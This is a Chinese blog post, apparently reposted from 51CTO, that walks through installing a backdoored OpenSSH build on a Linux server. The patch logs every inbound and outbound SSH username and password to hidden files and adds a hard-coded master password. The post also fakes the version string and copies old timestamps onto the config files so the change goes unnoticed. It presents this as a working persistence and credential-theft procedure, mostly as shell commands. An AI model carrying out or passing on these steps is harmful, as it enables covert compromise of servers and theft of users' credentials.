OpenSSH后门获取root密码

本文涉及的产品
运维安全中心(堡垒机),免费版 6个月
运维安全中心(堡垒机),企业双擎版|50资产|一周时长
简介:

1. 查看sshd系统版本

    [root@huangzp2 src]# ssh -V

    OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013


2. 解压版本,其中patch为补丁包

    tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

    tar -zxvf openssh-5.9p1.tar.gz


3. 替换补丁文件,替换前备份文件

    mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

    cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

    cd openssh-5.9p1

    patch < sshbd5.9p1.diff # 打补丁就是替换或修改原来的文件

 wKioL1jcre7DF2LmAAAa6j47P4A974.png

   patching file auth.c # 认证

   patching file auth-pam.c #认证

   patching file auth-passwd.c #认证

   patching file canohost.c

   patching file includes.h

   patching file log.c

   patching file servconf.c # 关于sshd服务端

   patching file sshconnect2.c # 关于sshd连接

   patching file sshlogin.c # 关于登录,把root密码记录下来

   patching file version.h # 关于版本


4. 修改后门密码和记录root密码的文件夹目录

   vim includes.h

 wKioL1jcrgHAdf-eAAANgmH3xGo061.png


  #define ILOG "/usr/share/ifile"  # 记录录到本机的用户名和密码

  #define OLOG "/usr/share/ofile"  # 记录从本机登录到其他机器的用户名和密码

  #define SECRETPW "12345678"  # 后门密码


5. 编辑vim version.h,修改版本号与原来一致

    原来:OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 wKiom1jcrg3xQPUPAAANEwxv5rg057.png


6. 编译安装

   组件:yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

            ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

            make -j 4 ;make install

            --prefix=/usr   # 安装目录

           --sysconfdir=/etc/ssh   # 指定sshd配置文件

           --with-pam   # pam认证

           --with-kerberos5   # kerberos认证


7. 还原新配置文件为旧配置文件时间

   说明:将ssh_config和sshd_config修改时间跟ssh_config.old和sshd_config.old一致

  touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config   touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config


8. 重启sshd服务

    service sshd restart


9. 验证并查看

    登录后再次查看就记录了密码,修改了密码再次登录也会记录

1)记录录到本机的用户名和密码

 wKiom1jcrieC6ujPAAAJgKVDebo956.png


2)记录从本机登录到其他机器的用户名和密码

 wKiom1jcrjXxYT4YAAALHEH91JA624.png


3)后门密码登录

 wKioL1jcrj-R5uaqAAAMhBnAks8757.png


10. 配置自动发送邮件

    ........略


    参看文献 http://www.cnblogs.com/croso/p/5280783.html











本文转自 huangzp168 51CTO博客,原文链接:http://blog.51cto.com/huangzp/1911767,如需转载请自行联系原作者
目录
相关文章
|
5月前
|
监控 安全 Linux
【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录
【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录
|
Linux 网络安全 数据安全/隐私保护
CentOS7下使用DenyHosts阻止SSH暴力攻击
CentOS7下使用DenyHosts阻止SSH暴力攻击
438 1
CentOS7下使用DenyHosts阻止SSH暴力攻击
|
Linux 网络安全 Python
CentOS7下安装SSHGuard阻止SSH暴力破解攻击
CentOS7下安装SSHGuard阻止SSH暴力破解攻击
418 0
CentOS7下安装SSHGuard阻止SSH暴力破解攻击
|
开发工具 git Perl
sudo提权
参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511 sudo概念: sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。
3056 0
|
Linux 网络安全 数据安全/隐私保护
|
Linux 数据安全/隐私保护